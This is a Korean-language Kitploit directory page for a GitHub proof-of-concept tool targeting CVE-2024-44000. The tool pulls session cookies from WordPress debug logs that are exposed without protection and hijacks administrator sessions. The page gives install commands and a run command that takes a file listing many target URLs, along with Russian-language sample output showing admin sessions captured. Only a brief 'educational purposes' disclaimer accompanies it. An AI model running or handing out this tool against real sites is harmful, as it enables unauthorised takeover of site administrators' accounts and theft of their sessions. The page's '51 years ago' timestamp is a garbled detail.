Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-44000 — 는 안전하지 않게 노출된 WordPress 사이트의 디버그 로그를 악용하고 세션 쿠키를 추출하도록 설계된 PoC 도구입니다 | Kitploit
도구/GitHubGitHub/geniuszly/cve-2024-44000
ExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed Teaming
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

는 안전하지 않게 노출된 WordPress 사이트의 디버그 로그를 악용하고 세션 쿠키를 추출하도록 설계된 PoC 도구입니다

저장소 보기
51년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

EN

GenCookieSessionHijack는 WordPress 사이트의 안전하지 않게 노출된 디버그 로그를 악용하여 세션 쿠키를 추출하는 PoC 도구입니다. 이를 통해 공격자는 활성 관리자 세션을 가로채고 WordPress 관리자 대시보드에 무단으로 액세스할 수 있습니다.

기능

  • WordPress 디버그 로그에서 쿠키 추출.
  • 세션 쿠키(예: wordpress_logged_in) 식별 및 필터링.
  • 관리자 액세스를 위해 자동으로 세션 하이재킹 시도.
  • 하이재킹된 관리자 세션을 브라우저에서 직접 열기.

사용법

설치

git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

도구 실행

  1. 대상 WordPress URL 목록을 파일에 한 줄에 하나씩 준비합니다(예: list.txt).
  2. 다음 명령어를 사용하여 도구를 실행합니다:
python GenCookieSessionHijack.py -f list.txt -o result.txt

매개변수

  • -f, --file: URL 목록이 포함된 파일의 경로 (기본값: list.txt).
  • -o, --output: 결과를 저장할 파일 (기본값: result.txt).

예시

python GenCookieSessionHijack.py -f targets.txt -o output.txt

이 명령은 targets.txt에서 URL 목록을 읽고, 세션 쿠키를 추출하여 사용하려고 시도한 후 결과를 output.txt에 저장합니다.

출력

세션 하이재킹 시도가 성공하면 도구는 하이재킹된 관리자 세션 쿠키가 포함된 URL을 생성하고 기본 브라우저에서 직접 엽니다.

예시 출력:

[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

법적 고지

이 도구는 교육 목적으로만 제공되며 불법 활동에 사용해서는 안 됩니다. 작성자는 이 도구로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

도구 다운로드